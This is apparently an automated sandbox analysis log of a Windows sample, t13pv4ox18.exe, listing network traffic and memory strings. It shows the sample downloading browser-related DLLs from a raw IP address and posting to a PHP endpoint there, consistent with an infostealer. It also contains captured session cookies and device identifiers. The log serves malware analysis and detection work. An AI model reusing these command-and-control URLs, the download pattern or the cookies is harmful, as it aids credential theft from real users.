Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=72v4VB23zfmnmNu&MD=YprhT5v2 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=72v4VB23zfmnmNu&MD=YprhT5v2 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=513=kSrSHqkufPQwm08dmYkpgdugbHnSy_KPn-Xey6rfgeBVI7xNET-LmtKH2FCugbYEiR7TjJPZY_5NHJozZyESTIX0vGNUY2YC9IUUjFtjSSefd0ZMbwt3BfHfC9-UsUd89ksl43nxqlJehLbKW9aeVxHZJ_xoidZ_cz4atAD-PjI
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/sqlite3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/freebl3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/mozglue.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/msvcp140.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/nss3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/softokn3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/vcruntime140.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: ogs.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: unknown HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900D492X-BM-CBT: 1696428841X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900D492X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticshX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2484Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714860042914&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.1
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151
Source: t13pv4ox18.exe, 00000000.00000002.2459112249.00000000282F3000.00000004.00000020.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2439993808.000000000044B000.00000040.00000001.01000000.00000003.sdmp, t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001B91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.php
Source: t13pv4ox18.exe, 00000000.00000002.2459112249.00000000282F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.php$
Source: t13pv4ox18.exe, 00000000.00000002.2459112249.00000000282F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.php0
Source: t13pv4ox18.exe, 00000000.00000002.2439993808.000000000044B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.php522a08e5d33469256bc74920121a
Source: t13pv4ox18.exe, 00000000.00000002.2459112249.00000000282F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.php8
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001B91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpBrowser
Source: t13pv4ox18.exe, 00000000.00000002.2459112249.00000000282F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpD
Source: t13pv4ox18.exe, 00000000.00000002.2459112249.00000000282F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpH
Source: t13pv4ox18.exe, 00000000.00000002.2459112249.00000000282F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpP
Source: t13pv4ox18.exe, 00000000.00000002.2459112249.00000000282F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpl
Source: t13pv4ox18.exe, 00000000.00000002.2459112249.00000000282F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpn
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001B91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpndpoint
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpnts
Source: t13pv4ox18.exe, 00000000.00000002.2459112249.00000000282F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpt
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001B91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpv
Source: t13pv4ox18.exe, 00000000.00000002.2459112249.00000000282F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpx
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/freebl3.dll
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/mozglue.dll
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/msvcp140.dll
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/msvcp140.dllX
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/nss3.dll
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/nss3.dllD
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/softokn3.dll
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/sqlite3.dll
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/vcruntime140.dllE
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/vcruntime140.dllU
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.9.dr String found in binary or memory: http://upx.sf.net
Source: chromecache_116.4.dr String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: t13pv4ox18.exe, t13pv4ox18.exe, 00000000.00000002.2465277640.000000006C7CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: t13pv4ox18.exe, 00000000.00000002.2453868196.000000001C158000.00000004.00000020.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465159932.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: GDHIEHJE.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_129.4.dr String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_129.4.dr String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_129.4.dr, chromecache_116.4.dr String found in binary or memory: https://apis.google.com
Source: chromecache_120.4.dr String found in binary or memory: https://apis.google.com/js/api.js
Source: GDHIEHJE.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: GDHIEHJE.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: GDHIEHJE.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_129.4.dr String found in binary or memory: https://clients6.google.com
Source: chromecache_129.4.dr String found in binary or memory: https://content.googleapis.com
Source: chromecache_129.4.dr String found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
Source: chromecache_129.4.dr String found in binary or memory: https://domains.google.com/suggest/flow
Source: GDHIEHJE.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GDHIEHJE.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GDHIEHJE.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_116.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_116.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_116.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_116.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: chromecache_131.4.dr String found in binary or memory: https://ogs.google.com/
Source: chromecache_131.4.dr String found in binary or memory: https://ogs.google.com/widget/app/so
Source: chromecache_116.4.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_129.4.dr String found in binary or memory: https://plus.google.com
Source: chromecache_129.4.dr String found in binary or memory: https://plus.googleapis.com
Source: chromecache_131.4.dr String found in binary or memory: https://ssl.gstatic.com
Source: KJKEHIIJJECFHJKECFHDGIIDBG.0.dr String found in binary or memory: https://support.mozilla.org
Source: KJKEHIIJJECFHJKECFHDGIIDBG.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KJKEHIIJJECFHJKECFHDGIIDBG.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: chromecache_120.4.dr String found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
Source: chromecache_129.4.dr String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: GDHIEHJE.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: GDHIEHJE.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_120.4.dr String found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: chromecache_129.4.dr String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_129.4.dr String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_131.4.dr String found in binary or memory: https://www.gstatic.com
Source: chromecache_131.4.dr String found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.atEDuNh539g.
Source: chromecache_116.4.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_116.4.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_116.4.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: KJKEHIIJJECFHJKECFHDGIIDBG.0.dr String found in binary or memory: https://www.mozilla.org
Source: t13pv4ox18.exe, 00000000.00000002.2439993808.000000000044B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: t13pv4ox18.exe, 00000000.00000002.2439993808.000000000044B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/e
Source: KJKEHIIJJECFHJKECFHDGIIDBG.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: t13pv4ox18.exe, 00000000.00000002.2439993808.000000000044B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: t13pv4ox18.exe, 00000000.00000002.2439993808.000000000044B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: KJKEHIIJJECFHJKECFHDGIIDBG.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: t13pv4ox18.exe, 00000000.00000002.2439993808.000000000044B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: t13pv4ox18.exe, 00000000.00000002.2439993808.000000000044B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/280x1024
Source: t13pv4ox18.exe, 00000000.00000003.2178743902.000000002E3A2000.00000004.00000020.00020000.00000000.sdmp, KJKEHIIJJECFHJKECFHDGIIDBG.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: t13pv4ox18.exe, 00000000.00000002.2439993808.000000000044B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/MJkcblqLnKTZpynGfecbiDGYkVYxgS.exe
Source: KJKEHIIJJECFHJKECFHDGIIDBG.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: t13pv4ox18.exe, 00000000.00000003.2178743902.000000002E3A2000.00000004.00000020.00020000.00000000.sdmp, KJKEHIIJJECFHJKECFHDGIIDBG.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: t13pv4ox18.exe, 00000000.00000002.2439993808.000000000044B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: t13pv4ox18.exe, 00000000.00000002.2439993808.000000000044B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/YxgS.exe
Source: t13pv4ox18.exe, 00000000.00000003.2178743902.000000002E3A2000.00000004.00000020.00020000.00000000.sdmp, KJKEHIIJJECFHJKECFHDGIIDBG.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: t13pv4ox18.exe, 00000000.00000002.2439993808.000000000044B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
